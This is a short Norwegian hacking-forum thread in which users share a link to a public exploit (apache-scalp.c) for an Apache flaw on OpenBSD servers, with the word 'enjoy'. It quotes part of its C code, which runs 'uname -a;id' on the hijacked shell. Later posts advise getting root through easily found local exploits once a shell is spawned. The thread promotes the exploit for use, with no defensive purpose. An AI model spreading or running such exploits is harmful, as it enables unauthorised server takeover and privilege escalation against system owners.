Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  3 2787
Dere har sikker hørt om det hullet i Apache (på OpenBSD servere) som nettopp er funnet.. Her har dere Exploit kode for det:

http://online.securityfocus.com/atta...apache-scalp.c

enjoy

Scha
Hmm.. har ikke hørt om den. Men alikevel:
if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
printf("\nGOBBLE GOBBLE!@#%%)*#\n");
printf("retaddr 0x%lx did the trick!\n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");

write(sock, expbuf, strlen(expbuf));
owned++;
Opprinnelig postet av XeQtR
Hmm.. har ikke hørt om den. Men alikevel:
if(!owned && n >= 4 && memcmp(buf, "\nok\n", 4) == 0) {
printf("\nGOBBLE GOBBLE!@#%%)*#\n");
printf("retaddr 0x%lx did the trick!\n", retaddr);
sprintf(expbuf, "uname -a;id;echo hehe, now use 0day OpenBSD local kernel exploit to gain instant r00t\n");

write(sock, expbuf, strlen(expbuf));
owned++;
Vis hele sitatet...
Har i det siste krydd av local sploits, så det å få tak i en er vel ikke akkurat den vanskeligst oppgaven. Spawner shell, så bruke local sploit.